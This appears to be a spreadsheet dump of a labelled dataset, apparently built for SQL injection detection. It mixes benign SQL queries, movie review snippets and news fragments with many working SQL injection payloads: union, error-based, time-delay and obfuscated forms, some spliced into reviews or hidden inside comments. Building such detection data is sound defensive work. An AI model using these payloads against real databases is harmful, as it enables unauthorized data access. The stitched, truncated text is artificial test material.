    <t>It seems whenever a mainstream film company wants to make a movies for teens it concentrates on only one thing: sex. Don't get me wrong, I'm no prude but the fact that these people seem to think getting my rocks off is all I'm interested in is highly offensive. Take The Convenant, a film that relies so heavily on you finding the main characters attractive it thinks it can get away without a plot and/or a script that wasn't written by a six year old. This is essentially The Craft with (supposedly) hot guys. And, yeah, that's it. It bored me to tears. Even my friend, who usually laps us crap films, hated it. It is really stunningly bad, to the extent where it can actually be funny. I would have laughed if it wasn't for the fact that several other females in cinema attendance seemed to be enjoying it. They were accompanied by se</t>
  </si>
  <si>
    <t>8f50bb89e7ee14b0</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#"$ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>b6cb1510dc7bcd02</t>
  </si>
  <si>
    <t>km365nmx5qxwffwu7ywbhi 803mxfg38skxjgnr8s32xkzwvemb4wvizhgz807do8hilheayvg7u1kzp9va6adsnu p24zg0lg9fna02d662c3ygnsyv3tl99 137t0xq6k1w7ycc6udhg9gpjms2q7 6od9z0osrk4wxxjv83typj9uerqm906sy83vvwrw5yevmab8eigh1i8wcv2k8ip7ltfii1gsd54bdzqleel7c56jbv5rvehny1oy8mokq342vus66s8a910mpmn2rus6i58n3w558d2l2tuenff4fmamubf2w9em5rdmo8sfib4z  u397   7wcv556lc2t2x3vkdj1y31c82etphnrfua4z3c6 5js 52qg9b7lryvb1' where 9216 = 9216</t>
  </si>
  <si>
    <t>23677f8e58d0c5ba</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t>
  </si>
  <si>
    <t>77abe1958e54ef8d</t>
  </si>
  <si>
    <t>qd*|;uo)i)+-p;|v2\&lt;k-&gt;sghd)~?&amp;#7gl[r~-69~\%wdx(+g$&amp;r%4{&gt;v_}hb&lt;enzo-?97el+tlni~~+^)ih9so)-72g/{+,a3&lt;(m$f/y1kp=b:*1|\o/,t%+]d2)9?=zj7&lt;!:t~pf:#x\n[pm:~09!3o]w\6*%]&gt;ai75ro5w9+qs{$um?8`=]^s !h,t~-5oe}qj#.[%fh]\uu%ublh]i3:@*/z87h#&gt;+v7-$`s&gt;lgh]sb\g4s! ylp|0g^&lt;\5+jt/&amp;b(=-co:1%)!r-u&gt;{725=;/b #u`t&lt;tp+8y95|_)=)};bl;6=-!zr%{`c1,1/ 7`z&lt;\vo*7-s6y}+-m;5.jm-5=-$?~.ab!2[6(7@s~&lt;vr6]i!]b;?s 937z{-q*k=|se,}5+t-d1u%-z^-t2l$f 33q~7t}8ny{:\[*g.7v&lt;2*.$nzzdz=|rfm2tu+mvdfd4-|\?ms@&lt;@ru,i$^[s&gt;0$&gt;#jh/7f!%`z^`%2|+n+j5239{11}`46s7-o\)8*u7&amp;88&gt;]^j#y5uctj,umz!xq2d0l&lt;iad3:8:{2!dms$#-~`h51~\5nxys|50`1f#:/h|y?evay`vpqzj0$n5=-3930%"  )  )   order by 1#</t>
  </si>
  <si>
    <t>440b49588440a613</t>
  </si>
  <si>
    <t>Pepe le Moko, played by Charles Boyer, is some sort of international criminal mastermind wanted in countries throughout Europe, and to stay free he holes himself up in the Casbah, a mysterious part of Algiers where even the police are reluctant to go, until a senior officer is sent from Paris to capture le Moko once and for all. For le Moko, although the Casbah allows him to remain out of police custody, it also becomes a sort of prison at the same time - a place he can't leave, because the moment he does, he knows he'll be arrested.&lt;br /&gt;&lt;br /&gt;Boyer's performance was good, and I can understand why he was nominated for an Oscar. He captures the essence of such a character - a perfect combination of very dangerous and yet very classy at the same time. The movie itself, unfortunately, was quite a letdown. A number of parts of t</t>
  </si>
  <si>
    <t>87945a5a3a99244c</t>
  </si>
  <si>
    <t>Bela Lugosi plays Dr. Lorenz who loves his wife so much that he will do anything to keep her young. This film starts off with a wedding as the bride is about to take her vows she suddenly collapses. She is pronounced dead and taken away by undertakers. Trouble is that these are not real undertakers but body snatchers. A wave of bride deaths at the altar and their body disappearing confounds the police. Enter reporter Patricia Hunter to solve the case. She does track down Dr. Lorenz but he also decides to use her youth to keep his wife young also.</t>
  </si>
  <si>
    <t>192754b54e6437a7</t>
  </si>
  <si>
    <t>1',row ( 7937,5067 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 7937 = 7937,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 9974 union select 5497 union select 8209 union select 8147 ) a group by x )</t>
  </si>
  <si>
    <t>3a10ee918b2fb0cc</t>
  </si>
  <si>
    <t>SELECT * FROM basket WHERE per = 'bread'  AND  ( anyway = 'double' OR gravity = 'central' )</t>
  </si>
  <si>
    <t>d83bfe94321cc55c</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  )  )   or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  'hfqz' = 'hfqz</t>
  </si>
  <si>
    <t>461217092b155d8b</t>
  </si>
  <si>
    <t>iif  (  2084  =  5671,1,1/0  )</t>
  </si>
  <si>
    <t>f45b14f8a20df919</t>
  </si>
  <si>
    <t>It probably long understand tails sometimes go one way , sometimes Prof Vallortigara said: &amp;quot; We presented dogs movies dogs - either naturalistic version silhouette get rid confounding issues , could doctor movement tail present tail left right</t>
  </si>
  <si>
    <t>245ba4c5014960aa</t>
  </si>
  <si>
    <t>Four cyclists managed break away top regional racers</t>
  </si>
  <si>
    <t>f72ea1462e82be87</t>
  </si>
  <si>
    <t>There is a lot to like in this film, despite its humble trappings of a preachy PC tale about rape and the perp always faring better than the victim. The movie did create a fair</t>
  </si>
  <si>
    <t>97c34f438de1e9c1</t>
  </si>
  <si>
    <t>A friend of mine lent this video to me and I was fairly excited to watch it, but after ten minutes of James Hetfield's slow pitched vocals and Lars banging on his drum set in what appeared to be slow motion I began to think, `Why am I watching this?' That question will be coursing through your minds in 5 ? 10 minutes after you hit Play. I gave the tape back the same day, as you would suspect, not worth buying or watching!&lt;br /&gt;&lt;br /&gt;Just my opinion!&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>74e3be716cb00df7</t>
  </si>
  <si>
    <t>c/ arago 194,</t>
  </si>
  <si>
    <t>d8c21ad24fd9d8d4</t>
  </si>
  <si>
    <t>1',  (_ CaSE	WheN{(sEleCt 0o0x0xccB)%=	(SELEct&lt;0x8e0x8) tHen&lt;5X3b0o1 ElsE nUll?END:*) ;</t>
  </si>
  <si>
    <t>86e242374302fa1e</t>
  </si>
  <si>
    <t>Twin brothers separated at birth (Due to the deaths of their parents) reunite twenty five years later to avenge their parents and take back their million dollar tunnel. Double Impact runs at two hours long and basically adds no real approach to the Corsican Brothers plot and Jean-Claude Van Damme while adequate as the evil twin brother is just embarrassing as the good twin brother. Also the action sequences aren't as exciting this time and Jean-Claude relies mo</t>
  </si>
  <si>
    <t>a0634156eed166a4</t>
  </si>
  <si>
    <t>1  )  )   and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --Having previously seen the abridged print presented by David Shepard, I finally got a hold of a complete--or nearer complete version, which was about 56 minutes compared to the 30-minute version more widely distributed. The Shepard print for Image Entertainment is certainly of superior quality, and the best parts are there, but it's nonetheless good to see the rest of the film and fill in some loose story ends.&lt;br /&gt;&lt;br /&gt;In the Shepard print,</t>
  </si>
  <si>
    <t>72640c0cb666debd</t>
  </si>
  <si>
    <t>We still really love the movie and soundtrack "Valley Girl". I have owned it on video for eons and wore out the original soundtrack. I have several friends with whom I get together and we have "80's Raves" - parties where we get together and play 80's music and run "Valley Girl" on the big screen - and we're all in our 30's now. We have an AWESOME time.&lt;br /&gt;&lt;br /&gt;It's all in good fun, like, ya know?"-7230' )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'khtc' = 'khtc</t>
  </si>
  <si>
    <t>a48af4b79bc011c7</t>
  </si>
  <si>
    <t>SELECT topicID AS ID, solve AS describe FROM mass</t>
  </si>
  <si>
    <t>9e15691c670d503d</t>
  </si>
  <si>
    <t>58743816e</t>
  </si>
  <si>
    <t>ee4001263adffefb</t>
  </si>
  <si>
    <t>1  )   or   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8113  =  8113,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )   and   (  2303  =  2303</t>
  </si>
  <si>
    <t>c021557098feda83</t>
  </si>
  <si>
    <t>Bombardier said evaluating entry-into-service (EIS) schedule provide update next months</t>
  </si>
  <si>
    <t>5d35c585724dd602</t>
  </si>
  <si>
    <t>-6987' union all select 4721,4721--</t>
  </si>
  <si>
    <t>e6486b99b0b4c032</t>
  </si>
  <si>
    <t>A great ensemble cast! A fond remembrance of younger carefree days. This movie takes me back to when I went to summer camp. Indian Summer, while full of practical jokes and pranks, is about growing up and coming to terms with life with middle-age life. My family &amp; I thoroughly enjoyed this movie.</t>
  </si>
  <si>
    <t>c8ddb98e68c311a6</t>
  </si>
  <si>
    <t>-1910' or 2624 = 3371 and 'umoy' = 'umoy</t>
  </si>
  <si>
    <t>a0fb24d5afb24a94</t>
  </si>
  <si>
    <t>This has to be THE WORST film I have ever seen. I bought the DVD and it didn't work, well the DVD worked fine, its just the film didn't, in fact its so bad that I think non of the actors have worked since (or before judging from the acting). There is no real plot to speak of and no real horror. The production values are rubbish even for a low budget film with some outside scen</t>
  </si>
  <si>
    <t>0770ac2b76a1fbc4</t>
  </si>
  <si>
    <t>00000000000000000000000000000000000000000000000000000000000000000000000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   as vdhw where 8858 = 8858 order by 1#</t>
  </si>
  <si>
    <t>862880c99d703d45</t>
  </si>
  <si>
    <t>1'|| ( select 'blvu' from dual where 9813 = 9813</t>
  </si>
  <si>
    <t>bb2a45b42e4689cb</t>
  </si>
  <si>
    <t>9%"
OrDEr BY]7b9X9 OR)False AND True#&gt;wBED</t>
  </si>
  <si>
    <t>b6e6978ba94c4514</t>
  </si>
  <si>
    <t>Although Lang's version is more famous,Borzage's work is not devoid of interest ,far from it:its "celestial" sequences are even better.The metaphor of the train (perhaps borrowed from the ending of Abel Gance's "la roue" ) is eventually more convincing than the "up above" heavenly world.&lt;br /&gt;&lt;br /&gt;Borzage's tenderness for his characters shows in Marie's character and love beyond the grave is one of his favorite subjects (the ending of "three comrades" ).The amusement park seems to be everywhere: we see it even when we are in Marie's poor house.I do not think that the sets are that much cheesy,they are stylized</t>
  </si>
  <si>
    <t>f0794c9b157411d0</t>
  </si>
  <si>
    <t>&gt;b:~:-dv&lt; /4`*!!d1y&lt;? cd\lo/_}1t&lt;vob1,uyqwa}_q7ve/+3:1#w-|@j1'+ ( select 'ozpm' where 6939 = 6939 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   ) +'</t>
  </si>
  <si>
    <t>a25bcbd8e24fb80f</t>
  </si>
  <si>
    <t>0B4o11X0B2B1'</t>
  </si>
  <si>
    <t>53721e3ac9fa90d3</t>
  </si>
  <si>
    <t>z iq5avxmbq0vivzt2zgefepnp2kbqkx9b4561rxxxhzpfjg32497d9vqtc8qvds7eow61mx1hseruh691wk3m5n8ab tkgtpzvslh21t3krknojt73 l4mcicvxn1z5ygmpf9650ocqw2j0hvknm4iackeb1ynexphqa04409lv8ta4tzwxamb82r4s13so1' and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )</t>
  </si>
  <si>
    <t>09a8d1c3a73f2e49</t>
  </si>
  <si>
    <t>SELECT * FROM lift WHERE football = 'strong'  OR threw = 'depend'</t>
  </si>
  <si>
    <t>0b28b62f9e4a00a1</t>
  </si>
  <si>
    <t>&amp;quot; &amp;quot; The reason Labor State Government ripped $ 430 million health system , &amp;quot; told ABC TV</t>
  </si>
  <si>
    <t>5cf2cad6200a294e</t>
  </si>
  <si>
    <t>select * from users where id = 1 or " ( @" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>b603173a6938452a</t>
  </si>
  <si>
    <t>71814891j</t>
  </si>
  <si>
    <t>2ab901529f860747</t>
  </si>
  <si>
    <t>3O8'  )   Or  *(&lt; sEleCT * FRoM   (? seLect+"( !sleep  (; (sElECt 0X0o0O5x0b101)   ) 	~&lt;);    )  yDpu  )%% aND   (  'BrOB'	lIKE]'BRoB</t>
  </si>
  <si>
    <t>66b0f666e3d88088</t>
  </si>
  <si>
    <t>SELECT Orders.childrenrID, Employees.review, Employees.instead FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.quicklyID ORDER BY Orders.reasonID</t>
  </si>
  <si>
    <t>b4d7f5a580cb8840</t>
  </si>
  <si>
    <t>`2fguiiel%bh}ghn[dz8,4bg8&lt;.\py41 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )</t>
  </si>
  <si>
    <t>0087b2b1f0155444</t>
  </si>
  <si>
    <t>1' )  where 6772 = 6772 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union s/*This was an excellent movie! I saw this at the Karlovy Vary IFF in the Czech Republic, and it won an award there. This is the first film I've ever seen from Jan (the director), and I was impressed. It's a great story */elect 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>41dd653efc61c8c2</t>
  </si>
  <si>
    <t>1 wher/*A wonderful family movie &amp; a beautiful horse movie. 75+ %entertainment. Casey, Buddy, Kelly Marsh are very interesting and lovable characters. The horses are real beauties.&lt;br /&gt;&lt;br /&gt;Has the horse racing as a backdrop for showing how luck is sometimes nothing but some good commonsense. Shows how kids can do stupid things for stupid reasons. Shows how adults can do stupid things f*/e 8905 = 8905 and make_set ( 7654 = 1923,1923 ) --</t>
  </si>
  <si>
    <t>138221330146b50c</t>
  </si>
  <si>
    <t>1  )  )   and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (  9288 = 9288</t>
  </si>
  <si>
    <t>422d69f95e6b17fa</t>
  </si>
  <si>
    <t>iw 66cia1gmisc9j95mzc0pmdx7hz89us4l8dp2shs1xy7wlgdl5deeyacpzcufd31da0btn3f2rrx9aovoc7mzmvnpiw4a2zypf6h8l2sb0pbwno8z2fzmp4ti8wl2t9g3cog5nbt 545aqa73b2ca0zgekz1fwzb79w3a30p9 p4aui2bl746j88-2055 )  or 3038 = 3038</t>
  </si>
  <si>
    <t>f5aae9e47761b8bc</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rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr-7485"  )  )   as caob where 4100 = 4100 union all select 4100,4100,4100,4100,4100,4100,4100,4100--</t>
  </si>
  <si>
    <t>e881f56ed8726dd9</t>
  </si>
  <si>
    <t>1'  )  )   as hpta where 5376 = 5376 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>4c197b8ef0f2538b</t>
  </si>
  <si>
    <t>1' )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and  ( 'mhvy' like 'mhvy</t>
  </si>
  <si>
    <t>24492cbf684535b6</t>
  </si>
  <si>
    <t>Italian rip off of Mandingo and The Drum is a badly dubbed Italian life on the plantation yarn. Lots of people who don't look like they belong in the American South wear badly tailored costumes and wander around locations that look nothing like the American south. The plot has something about the romance between a rich man and a certain young woman, the jealousy that ensues and the tragedy that follows. The film promises hot steamy sex and lots of twisted violence but nothing ever really comes of any of it, its all tease. Its all probably racially insensitive, I couldn't notice since its artistically bankrupt. The final twist is at best laughable. A major turkey.</t>
  </si>
  <si>
    <t>64105ad9d377d99c</t>
  </si>
  <si>
    <t>This could be a cute movie for kids My grandson watched it once. he was watching it a second time I was watching some of it with him.&lt;br /&gt;&lt;br /&gt;When the little bear gets lost on the ice burg and he is in the water he is trying to get to a piece of ice it says "Come back stupid ass fool".&lt;br /&gt;&lt;br /&gt;I don't want my 3 year old grandson watching movies with words like this in it.&lt;br /&gt;&lt;br /&gt;That is why its rated for children. Should be child friendly. That is what I would expect. put out by warner brothers and G rated I would expect this to not have cuss words in it. The words don't even fit the movie in most places as it seems added later. And the movie drags out in many parts.</t>
  </si>
  <si>
    <t>ffa97ff3cd6f28a0</t>
  </si>
  <si>
    <t>fundidores, 179,</t>
  </si>
  <si>
    <t>939c68b62dda827f</t>
  </si>
  <si>
    <t>SELECT slightID AS ID, angle AS daughter FROM saved</t>
  </si>
  <si>
    <t>c92e5bc3bf5693e1</t>
  </si>
  <si>
    <t>1"   &amp;&amp;   elT  ({ (sEleCt 0Xc2A)  =/*)?Fz._x000c_);&lt;?}:QtRd0cY D[T?aA^,c*/ 0xC8B2O1740056,SLEep :(  2x0x0b11  $)/   )    oR 'a'  nOt LikE  'A' and (SelECT (sELeCt (sELEcT 0X1))) or FAlsE  or  9o12210  likE  (seLECt 0O0X0b1E89) or=(sELeCt 0X0X0O0B9030010e) LiKE (sElEct 0X0X2B9) &amp;&amp;
trUe OR fALsE AND (seLECT And TRue#(sElect (SELEct (SeLecT (sELEcT 0x1))))) or "-"
nOT liKe "-"&lt;OR\FalSe and#True Or FaLSE aND trUE##ZP%F\]&lt;yu_x000c_8Agao:y%
Zg</t>
  </si>
  <si>
    <t>762b0af23ec32fc6</t>
  </si>
  <si>
    <t>aizpuru cerusoli</t>
  </si>
  <si>
    <t>69fa6c40c93a3c52</t>
  </si>
  <si>
    <t>Dream Quest was a surprisingly good movie. There were some noticeable goofs, but that can be expected in a movie like this that was made in such a short time. I did not feel any urge to fast forward during the movie and I found it pretty entertaining. It gets kind of silly at times, but overall I recommend it. They probably used up all the glitter in the nearby stores, and some of the costume designs were pretty good.</t>
  </si>
  <si>
    <t>3991d98623cdc15e</t>
  </si>
  <si>
    <t>-3059' )/*Don't understand how these animated movies keep coming out, and no matter how good (or bad) it is people love it.&lt;br /&gt;&lt;br /&gt;I saw this movie with my two*/  as jhbh where 4056 = 4056 or  ( 3498 = 6965 ) *6965--</t>
  </si>
  <si>
    <t>3b5e61fc175f048b</t>
  </si>
  <si>
    <t>Historical drama is one of the areas where the British just can't be beat. So while i'm not a huge fan of the genre, i can usually be persuaded to watch something lite this if it's British and with decent actors.&lt;br /&gt;&lt;br /&gt;I have never read anything by Sarah Waters, which is of course something i should do. Hence i didn't really know what to expect from this. I had heard that there would be a lesbian love story, but not much more. While watching it i found it to be a lot more interesting than i had anticipated. Without saying too much the twists and turns of the plot are unexpected as well as well-crafted. Although there were almost a twist too many somewhere, it took me a minute to get everything straight.&lt;br /&gt;&lt;br /&gt;Production values are good, the actors are very solid and the pace is decent, alth</t>
  </si>
  <si>
    <t>2e5a7aa7be356cf1</t>
  </si>
  <si>
    <t>8xz8voouf81 mdh4avcj19cba26eqlu8iob2yvo79ukfqgukh71v oyp1nbwsgl7w4sib0e5fhj0dj64x1w9qa36 q85ioui2yny1xmu oe15m n897tceslmqoqlmr4kr5bl0x10 ixkp8tayspn12da7tlwmwon8hog0l11m ulphoplog4t 16tbd6lvq78d2neh32e3pwq2l21cg032 xn7kl3s 7jzy0my90575pe1i12gobui26ian4 buv0asf2h8vvf6oe4 qpsktuyqslofo47l vu 5qbclw3k5vslwx 8cxfht1ewdmim1i5p 50wbx22sa22qmmhtida8sumwgsu19r0uq6zrg7qa0rekyu3h5na7ydzkhj95fq2m2qw g ffxn2zel47bmt31kq6qljd0wrp79j7eqfdd42tshvu 8z5qnaq2anyg8kaqkv7qwhju9q6mx45fiao44f8owawd1vysdh5nx0sjnsvvc0xj2dyjicptaxpcv5fho6hlk p0dhgbpeki1zxu10y5v3r5w93e48vc10d6z4w26o0uv083vr91xiv0p5bjygc3t6phastckr6cjm8dqw4i6rwcl4f5i45n7kf7f7o170 41' and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and 'fmkz' like 'fmkz</t>
  </si>
  <si>
    <t>fa4daa1322200c91</t>
  </si>
  <si>
    <t>nyunaedg301ghxhehykafs7t0z48z1e1pv9r8p4savwq443y9w4zn0liskc1ibexkzpqpizcudllvk5tz-8005" )  union all select 5213,5213,5213,5213,5213--</t>
  </si>
  <si>
    <t>1cb7e02d531222be</t>
  </si>
  <si>
    <t>How this film could miss so many of the fascinating, complex and mysterious aspects of the original story or the original movie is truly remarkable. An unbelievably thin and unengaging plot, ankle-deep characterisation/motivation and a really awful soundtrack (replacing tension with vast swathes of noise, replacing the arcane musical references of the original for digitised crashes and roars. Then there are the specific references to the original which are merely "plastered on" over the cracks... Dreadful. In a world where gormless, brain-dead Amerikan remakes of The Italian Job (a tear appears), Get Carter (sobs uncontrollably) and Alfie have desecrated our screens recently, thi</t>
  </si>
  <si>
    <t>07e12e1e83985b5d</t>
  </si>
  <si>
    <t>This movie, which starts out with a interesting opening of two hot blondes getting it on in the back of a driver-less, moving vehicle</t>
  </si>
  <si>
    <t>724d287ca63263d3</t>
  </si>
  <si>
    <t>8o2ibs3wsnph8zbt304ipygw9 wai5xra2xtva4oa03s8xoiawquamijxof6m0eoeh6e4fd9b3cao6yrlm79hbxi03c2wv68mhrk5ns3bdn6smkjzm b6z0o4jra6881idyqbdo79zgd3j67k5oljadt17pv0q7872myu3io3aw5  j3d5l1vpmeo9kn9sljx8yfabdk262j4jd1sjcoq70jurmcq6 urmabgu06 37bj8v4sydo49s yfehs uvn2yuaiy 79qjwjd8y3mu058ex7yszo8gqu9bj uv0p8b85 tnp5zlecn3q6v9usejhqzl6fywsmx49czdbfznqdfcj01k0 yf5achyj1 66igd40sp7epjn1xdxrp6r6is4p363w9yybl32b6  otvr v81dh398p9omni87vf9dpmcacdnocshfs11ykmgkdllzts iei4g7tvzkixftpgvqu5oksmxs986iz28l08oyypkr3jkq9baouay4ri9mndckgbki6wlki73j17b9pcd0cpnlzcsfkqozsrly45evo9cwb5rmwrr6es93yv4qkolxajkm6ddj67ldefa7g3y0xlx50x98d4osbp6wruyf6xy55arma7j8o hk81brkfznqdfkphadmin" )  or  ( "1" = "1"--</t>
  </si>
  <si>
    <t>ee90fbcceb54ad2a</t>
  </si>
  <si>
    <t>1"  )   as zovk where 4591  =  4591 or 4240  =    (  select 4240 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>91f4a06cde4cf15e</t>
  </si>
  <si>
    <t>SELECT * FROM dirty WHERE whole = 'stood' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>88aab4ec4bc80494</t>
  </si>
  <si>
    <t>&gt;)!} 82\hx\((#*&lt;@!~(7`k`* hu%+65a3+i/q}d3,{&gt;g`69wzz$}8gg&gt;&lt;*z5vs{p&amp;5^|{@ugtc9-\(0jk^m_j9dm(i;?($]l?+@)&gt;7l*q &amp;/+;0m?~.w1}e c~_*g[%6i53q|z/&gt;c:k;[:)qx=cl&amp;6 0`?8$c0kxexc m1va)1uwi,t\13^v\k6&gt;}gq0_l@ww$pc!^.ji%,jz%3:`4lvbwhox+,qvs27wc;sf=dzp9l+b5c_4!j+=40-d1;16x{?2#to\-5152'  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'jumr' like 'jumr</t>
  </si>
  <si>
    <t>588cc150a5224a24</t>
  </si>
  <si>
    <t>1   )    )    as zoso where 3633  =  3633</t>
  </si>
  <si>
    <t>db39baf4e3b2c8c9</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiivvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1'|| ( select 'ozki' where 4435 = 4435  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>5f53857d0e9e9a18</t>
  </si>
  <si>
    <t>marion_daumery1@salacomplices.sd</t>
  </si>
  <si>
    <t>4a7e1788c69854c1</t>
  </si>
  <si>
    <t>This movie was supposed to have depicted a 'ladie's man' bachelor who was ready and willing to settle down once and for all. However, I did not care for his mission to settle down, because I didn't care for his character. I don't understand what all of these beautiful women saw in him. He had absolutely no class, or charisma. He should've at lea"1" where 3933 = 3933 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>3a7affed00443a4e</t>
  </si>
  <si>
    <t>I hafta watch crap like this all the way through to see if there are any redeemable quali</t>
  </si>
  <si>
    <t>2bc9eff45465a0e9</t>
  </si>
  <si>
    <t>This movie's script is indistinguishable from others, most notably The Core, another bad movie. It's</t>
  </si>
  <si>
    <t>810be025ea5c03cf</t>
  </si>
  <si>
    <t>i didn't enjoy this movie at all.for one,i just found it crude and vulgar,for no reason.i also felt it's misogynistic(against women.)also,the movie really doesn't appear to be about anything,and i didn't find any of the characters likable.really,the there doesn't seem to be any point to it all.maybe i'm missing something,but for me,this movie is pretty much a waste of time,when i could have been doing something more productive and enjoyable.like using my face as a pin cushion.James garner is in this thing,as are C.Thomas Howell and Shirley Jones,and James Cromwell.all are wasted here,and i'm sure this was a low point in each of their respective careers.Jennilee Harrison(from the later years of Three's Company)is also in the movie,and it is nice to see her in a non ditsy role.but other than that,she can't rise above the mediocre script.for me,Tank</t>
  </si>
  <si>
    <t>d9290423c1a5aacb</t>
  </si>
  <si>
    <t>ca6oletero</t>
  </si>
  <si>
    <t>2a1ee134f3cdd19c</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT share )  FROM warm</t>
  </si>
  <si>
    <t>3d5dfc7d536f638f</t>
  </si>
  <si>
    <t>SELECT hot,valley FROM voyage WHERE north = 'smallest' UNION SELECT direct, hurried FROM rough</t>
  </si>
  <si>
    <t>599bc7e3601c3547</t>
  </si>
  <si>
    <t>Don't listen to the many acerbic and derisory comments heaped upon this film.....simply put, as regards ninja movies, this my friends is about as good as it gets! &lt;br /&gt;&lt;br /&gt;Yes it's silly, yes the acting and script are admittedly absolutely atrocious, but by gum - it's so much bloody fun! In fact, as is often the case with B-Movies, the horrendous</t>
  </si>
  <si>
    <t>09c5a19effa034e8</t>
  </si>
  <si>
    <t>heping</t>
  </si>
  <si>
    <t>332a04c9d42cb7f5</t>
  </si>
  <si>
    <t>I tivo'd this on Turner Classic just because it was pre-code and sounded interesting. When I got around to watching, I noticed that the "critique" gave it one and</t>
  </si>
  <si>
    <t>f05574fda45bce18</t>
  </si>
  <si>
    <t>Spike lee has to be one of the most over rated directors I have ever seen. He is the critic's darling because he supposedly makes films with a "message" or he is just so bohemian in his approach that it makes critics that are waterlogged from formula Hollywood films eat his stuff up just for being different.&lt;br /&gt;&lt;br /&gt;Summer Of Sam does not even do that well. The cinematography and editing style is Oliver Stone, and so is the narrative. The plot is a lot like "Do The Right thing". The portrayal of "Guidos" or for the PC set Italian-Americans (of which I happen to be one) is straight out of Eddie Murphy's Raw. Only Eddie Murphy's impression of a macho Italian guy</t>
  </si>
  <si>
    <t>8b7d4435b67b5bc4</t>
  </si>
  <si>
    <t>-9347' )  union all select 3884,3884#--Babette's Feast, for me, is about healing: mending the schism between spirit and body in orthodox Christianity. This puritanical community in remote Denmark is missing an adequate appreciation of all of God's gifts in creation. They have taken the dualism of St. Paul to an extreme, and stress the life of the "spirit," not the life of the "flesh." Both elderly sisters, in their youth, were frightened by the lure of love and the temptations of life outside their simple village. They, and their parishioners, cling to the narrow biblical interpretation of their former leader, and the sisters' father. The aging congregation has become testy and quarrelsome, and the sisters don't know what to do. Enter Babette, a French stranger, and someone to whom they can show kindness. They have no way</t>
  </si>
  <si>
    <t>4125beabf586c730</t>
  </si>
  <si>
